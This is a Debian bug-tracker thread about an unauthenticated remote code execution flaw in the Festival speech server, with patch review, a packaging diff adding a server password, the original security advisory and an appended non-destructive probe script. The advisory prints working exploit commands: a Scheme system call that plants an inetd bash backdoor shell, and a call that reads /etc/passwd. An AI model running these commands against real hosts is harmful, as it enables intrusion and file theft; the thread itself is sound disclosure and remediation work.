Bug#491114: Work around confirmation
> /etc/udev/rules.d/65_dmsetup.rules needs to be changed so that the three first lines all have GOTO="device_mapper_end".

Confirmed that this resolves the problem.

Cheers,
Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
> Hi Tim,
>
> * Tim Brown <[EMAIL PROTECTED]> [2008-03-01 15:28]:
> > On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> > > > It probably also needs rewording since SuSE confirmed it affected them
> > > > and I think we agree it affects Debian. How do we go about doing
> > > > that - is that something for you guys or do I need to get involved?
> > >
> > > I see your point, I will contact mitre to update the CVE id
> > > or to assign a new one.
> >
> > No news from MITRE? At least their CVE entry doesn't appear to be
> > updated.
>
> Huh? "which allows local and remote attackers to execute
> arbitrary commands"
>
> Cheers
> Nico

I saw that, but assumed it would reference Debian in some manner. After all, Debian distributions (and derivatives including Ubuntu hardy) are/were exploitable.

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 20:12:29 Nico Golde wrote: > > It > > probably also needs rewording since SuSE confirmed it affected them and I > > think we agree it affects Debian. How do we go about doing that - is > > that something for you guys or do I need to get involved? > > I see your point, I will contact mitre to update the CVE id > or to assign a new one. No news from MITRE? At least their CVE entry doesn't appear to be updated. > I guess they will happily release a DSA if someone comes up > and provides a fixed stable package that just works. I've attached a patch that I think resolves this issue on stable - no warranties. Just wanted to make this final email as I'm intending to release my advisory shortly subject to any updates here. Tim -- Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/> diff -rN festival-1.4.3/debian/changelog festival-1.4.3-new/debian/changelog 0a1,18 > festival (1.4.3-17.3) unstable; urgency=high > > * Fix root security hole. Thanks to Tim Brown. > + debian/festival.init: Read festival.scm upon start. > (Closes: #466146) > * debian/festival.scm: > + Add sane default values for server. The festival > init script now uses these values while starting the > server. > * debian/README.Debian: > + Document some changes on daemon mode. > * debian/templates, debian/config, debian/festival.postinst: > + Ask for server password during install. > * debian/lintian-override: > + Permission of /etc/festival.scm should be 0600. > > -- Tim Brown <[EMAIL PROTECTED]> Sat, 01 Mar 2008 12:40:33 + > diff -rN festival-1.4.3/debian/config festival-1.4.3-new/debian/config 0a1,20 > #!/bin/sh -e > > # Source debconf library. > . 
/usr/share/debconf/confmodule > > # grab selected config values from the config file and store them > # in debconf's database > > # first grab existing value (keep config file's existing value) > CONFIG_FILE=/etc/festival.scm > > # to help security, let password be entered afresh each time > # (and don't display the value left in the debconf database of > # "password written to config file") > db_set festival/server_passwd "" > > db_input critical festival/server_passwd || true > > db_go || true > db_stop || true diff -rN festival-1.4.3/debian/festival.init festival-1.4.3-new/debian/festival.init 27c27 < --exec $DAEMON -- --server --- > --exec $DAEMON -- --server -b /etc/festival.scm 39c39 < --exec $DAEMON -- --server --- > --exec $DAEMON -- --server -b /etc/festival.scm diff -rN festival-1.4.3/debian/festival.postinst festival-1.4.3-new/debian/festival.postinst 0a1,50 > #!/bin/sh > > set -e > > . /usr/share/debconf/confmodule > > # write selected values into config file > CONFIG_FILE=/etc/festival.scm > > PASSWD_ENTRY=server_passwd > > PASSWD=your_festival_passwd > db_get festival/server_passwd > PASSWD="$RET" > # insert the entry, if it is missing (which it ought not to be) > grep -Eq "^[[:blank:]]*\(set![[:blank:]][[:blank:]]*$PASSWD_ENTRY[[:blank:]]" $CONFIG_FILE || \ > echo "(set! $PASSWD_ENTRY \"$PASSWD\")" >> $CONFIG_FILE > > # only process the password if it is not empty > if [ "$PASSWD" ]; then > # copy config file here in order to preserve permissions when actually > # building the tmp file in the sed step > cp -a -f $CONFIG_FILE $CONFIG_FILE.tmp > > # escape sed special characters > #echo $PASSWD | sed -n 's|[\|\$\&\.\*\%\^\+\?]|\\&|g' > PASSWD=$(echo $PASSWD | sed 's|[\[\(\)\|\$\&\.\*\%\^\+\?\/]|\\&|g') > sed -e "s/(set.[[:blank:]]\+$PASSWD_ENTRY.*)/(set! 
$PASSWD_ENTRY \"$PASSWD\")/" \ > < $CONFIG_FILE > $CONFIG_FILE.tmp > > mv -f $CONFIG_FILE.tmp $CONFIG_FILE > # remove the password from the debconf database > db_set festival/server_passwd "password written to config file" > > fi > > # extra safety check: ensure passwords in config file cannot be read by anyone > chown nobody /etc/festival.scm > chmod og-r $CONFIG_FILE > > # Supporta log file > mkdir -p /var/log/festival > touch /var/log/festival/festival.log > chown nobody:audio /var/log/festival/festival.log > > # must indicate we are done with debconf, or the script will hang when the > # server is started below (DEBHELPER section, via dh_installinit). > db_stop > > #DEBHELPER# diff -rN festival-1.4.3/debian/festival.postrm festival-1.4.3-new/debian/festival.postrm 4a5,9 > if [ "$1" = "purge" ];then > rm -rf /var/log/
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:
> * Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> > I've just noticed that the security tracker
> > http://security-tracker.debian.net/tracker/status/release/unstable has
> > been updated for festival. However it is wrong. This bug *is* remotely
> > exploitable (due to the aforementioned lack of ACLs).
>
> Sure it is :) The remote exploitability status isn't set
> manually by us. This is extracted automatically from the NVD
> text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which
> doesn't mention the word 'remote'. I think that's the
> reason. Patches welcome :)

Okay, so the CVE entry is wrong (which probably explains why it wasn't correctly resolved by the maintainers when it was first looked at). It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved?

Also, since we have a working patch for the issue on mentors, what happens now? Can it go through as an NMU? What about the backport to stable and testing?

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Nico,

I've just noticed that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the aforementioned lack of ACLs).

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tue, 19 Feb 2008, Kumar Appaiah wrote:
> On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:
> > Hi Tim,
> > this is somehow strange, this CVE id was already fixed in 1.4.3-21
> > referring to the security tracker (see bug #435445 for reference).
> > Did this fix get lost somewhere in the package history?
>
> It appears that the troublesome issue of running festival as a less
> privileged user was handled in the last upload. However, what was not
> handled was the restriction of access to localhost by default, and the
> necessity to introduce a password for this purpose. The last upload,
> which Tim has checked a few times, introduces this feature, and thus
> makes the security aspect a bit more complete. Hope this is fine.

Thanks for the follow up. This is my impression too. Gentoo introduced localhost restrictions in their patch for the original issue, in addition to changing the init process of the server so that it runs under its own privileges rather than root - they didn't add authentication though. The Debian patch only changed the init process of the server, which, while preventing a full root compromise, did not prevent remote unauthenticated access.

Looking at the previous bug history there was some discussion about disabling the system command too, but IMO this does little to fix the underlying problem of an unauthenticated scheme interpreter bound to a remote port with no ACLs or authentication.

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 07:42:06 Kumar Appaiah wrote:
> Dear Tim,
>
> Many thanks for the constant support. The package should now be all
> right with this change, available at the same location.

Not a problem - it seems to build cleanly now with no problems. I guess it can be pushed to unstable and backported to stable security.

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Monday 18 February 2008 01:40:00 Kumar Appaiah wrote:
> On Sun, Feb 17, 2008 at 05:32:44PM +0000, Tim Brown wrote:
> > I've just built it here. It is lintian clean and the patch provides the
> > required security fix. However 2 small points, 1) The logging doesn't
> > work as /var/log/festival isn't created (and owned by festival,audio) 2)
> > Passwords are displayed by debconf rather than hiding them with *'s. I'm
> > only a fellow maintainer, but I'm sure your mentor can provide
> > appropriate feedback on these issues.
>
> First of all, many thanks for pointing out both these issues. I have
> solved both, and the fixed version is here:
>
> dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Looks good apart from Lintian reporting:

N:
N: chown user.group is called in one of the maintainer scripts. The
N: correct syntax is chown user:group. Using "." as a separator is still
N: supported by the GNU tools, but it will fail as soon as a system uses
N: the "." in user or group names.
N:

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:
> Please note that I now use debconf to ask for the password to be
> entered. I have tested that the system works fine, but as this is my
> first debconf experience, a quick review would be appreciated,
> followed by upload, as this is a security bug.

Another thought, the fix will require backporting to stable so that it can go into the security updates.

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:
> dget -x http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc
>
> Please note that I now use debconf to ask for the password to be
> entered. I have tested that the system works fine, but as this is my
> first debconf experience, a quick review would be appreciated,
> followed by upload, as this is a security bug.

Kumar,

I've just built it here. It is lintian clean and the patch provides the required security fix. However 2 small points, 1) The logging doesn't work as /var/log/festival isn't created (and owned by festival,audio) 2) Passwords are displayed by debconf rather than hiding them with *'s. I'm only a fellow maintainer, but I'm sure your mentor can provide appropriate feedback on these issues.

Cheers,
Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote:
> tags 466146 pending
> thanks
>
> Hi!
>
> A package is ready for upload at mentors. Thanks for the report. If,
> after consulting my sponsor and some security people, I find that it
> is OK, it shall be uploaded.

Kumar,

Can I suggest that a password is set (perhaps take a look at the Debian MySQL server package which does something similar for the debian-sys-maint in the /etc/mysql/debian.cnf file). Limiting access to local hosts is an improvement, but as noted it does not guard against local privilege escalation attacks.

Tim
-- 
Tim Brown <mailto:[EMAIL PROTECTED]> <http://www.nth-dimension.org.uk/>
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole

Nth Dimension Security Advisory (NDSA20080215)

Date: 15th February 2008
Author: Tim Brown <mailto:[EMAIL PROTECTED]>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Festival 1.96:beta July 2004 <http://www.cstr.ed.ac.uk/projects/festival.html>
Vendor: Centre for Speech Technology Research, University of Edinburgh <http://www.cstr.ed.ac.uk/>
Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable.

Technical Details

The Festival server, which can be started using festival --server, is vulnerable to unauthenticated remote command execution due to the inclusion of a scheme interpreter. It is possible to make use of standard scheme functions in order to execute further code, like so:

    $ telnet 10.0.0.1 1314
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    (system "echo ' stream tcp nowait festival /bin/bash /bin/bash -i' > /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")
    Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited, the inclusion of a scheme interpreter available without authentication allows for other vectors of attack. Scheme functions such as SayText and tts (which reads a file on the vulnerable system) are of particular interest, for example:

    $ telnet 10.0.0.1 1314
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    (tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in this manner is entirely intentional, the insecure default state of the server could be exploited, particularly where the user is unaware of the server's existence.

Solutions

In order to completely protect against the vulnerability (in the short term), Nth Dimension recommend turning off the server or filtering connections to the affected port using a host based firewall. The server itself can be secured by applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a default configuration which limits access to localhost and setting an optional password which prevents unauthenticated access.

-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages festival depends on:
ii  adduser        3.105             add and remove users and groups
ii  libaudiofile0  0.2.6-7           Open-source version of SGI's audio
ii  libc6          2.7-8             GNU C Library: Shared libraries
ii  libesd0        0.2.36-3          Enlightened Sound Daemon - Shared
ii  libestools1.2  1:1.2.96~beta-2   Edinburgh Speech Tools Library
ii  libgcc1        1:4.3-20080202-1  GCC support library
ii  libncurses5    5.6+20080203-1    Shared libraries for terminal hand
ii  libstdc++6     4.3-20080202-1    The GNU Standard C++ Library v3
ii  lsb-base       3.1-24            Linux Standard Base 3.1 init scrip
ii  sgml-base      1.26              SGML infrastructure and SGML catal
ii  sysv-rc        2.86.ds1-53       System-V-like runlevel change mech

Versions of packages festival recommends:
ii  festvox-kallpc16k [festival-v  1.4.0-5  American English male speaker for

-- no debconf information
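A non-destructive check for the exposure the advisory describes, added here as an example; it is not part of the original report, the Gentoo patch or the festival package. Instead of the `(system ...)` payload it sends the harmless expression `(+ 1 2)` and reports whether the server evaluated it. The reply framing (a three-byte `LP`/`WV`/`ER` status, the payload, the terminator `ft_StUfF_key`, then `OK`) and the password handshake (the client's first line is compared with `server_passwd`) are assumptions about the Festival server protocol that the page does not state; `MockFestival` is a constructed stand-in implementing exactly those assumptions so the script runs offline, and `FESTIVAL_PORT` is the port from the advisory's telnet transcript.

```python
"""Probe a Festival server for unauthenticated Scheme evaluation (added example)."""
import socket
import threading

FESTIVAL_PORT = 1314           # port used in the advisory's telnet transcript
STUFF_KEY = b"ft_StUfF_key"    # assumed reply terminator (not stated on the page)
PROBE_EXPR = b"(+ 1 2)\n"      # harmless: proves eval works without touching the host
EXPECTED = b"3"


def parse_reply(data: bytes):
    """Return (status, payload) for one framed reply, or None if incomplete."""
    if len(data) < 3:
        return None
    status, rest = data[:3], data[3:]
    if status not in (b"LP\n", b"WV\n", b"ER\n"):
        return ("??", rest)
    end = rest.find(STUFF_KEY)
    if end < 0:
        return None
    return (status[:2].decode(), rest[:end].strip())


def probe(host, port=FESTIVAL_PORT, password=None, timeout=3.0):
    """Classify host:port as 'eval_ok', 'rejected', 'closed' or 'unknown'.

    'eval_ok' with password=None means anyone who can reach the port gets a
    Scheme interpreter, i.e. the unauthenticated exposure in the advisory.
    """
    # Assumed handshake: the password, if any, is the first line the server reads.
    request = (password.encode() + b"\n" if password is not None else b"") + PROBE_EXPR
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(request)
            buf = b""
            try:
                while not (STUFF_KEY in buf and buf.endswith(b"OK\n")):
                    chunk = s.recv(4096)
                    if not chunk:      # server hung up: bad password or ACL
                        break
                    buf += chunk
            except ConnectionResetError:
                buf = b""              # hard hang-up, same meaning as a close
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "unknown"
    if not buf:
        return "rejected"
    parsed = parse_reply(buf)
    if parsed and parsed[0] == "LP" and parsed[1] == EXPECTED:
        return "eval_ok"
    return "unknown"


class MockFestival:
    """Constructed stand-in serving one client under the assumed protocol."""

    def __init__(self, password=None):
        self.password = password
        self._srv = socket.socket()
        self._srv.bind(("127.0.0.1", 0))       # loopback, ephemeral port
        self._srv.listen(1)
        self.port = self._srv.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self._srv.accept()
        with conn, conn.makefile("rb") as f:
            if self.password is not None:
                if f.readline().rstrip(b"\r\n") != self.password.encode():
                    return                     # wrong password: drop the client
            expr = f.readline().strip()
            value = b"3" if expr == b"(+ 1 2)" else b"nil"   # toy evaluator
            conn.sendall(b"LP\n" + value + b"\n" + STUFF_KEY + b"OK\n")
        self._srv.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # python3 probe.py <host> [password]
        print(sys.argv[1], probe(sys.argv[1], password=sys.argv[2] if len(sys.argv) > 2 else None))
    else:                                      # offline demonstration against the mock
        print("no password set :", probe("127.0.0.1", MockFestival().port))
        print("password set    :", probe("127.0.0.1", MockFestival("s3cret").port))
```

Run it as `python3 probe.py 10.0.0.1` against a host: `eval_ok` with no password means the server is in the state the advisory describes; after the localhost restriction or a `server_passwd` is applied, a remote run should come back `rejected` (the server closes the connection without evaluating) or `closed`. A server that silently holds the connection open returns `unknown` after the timeout rather than being mistaken for either.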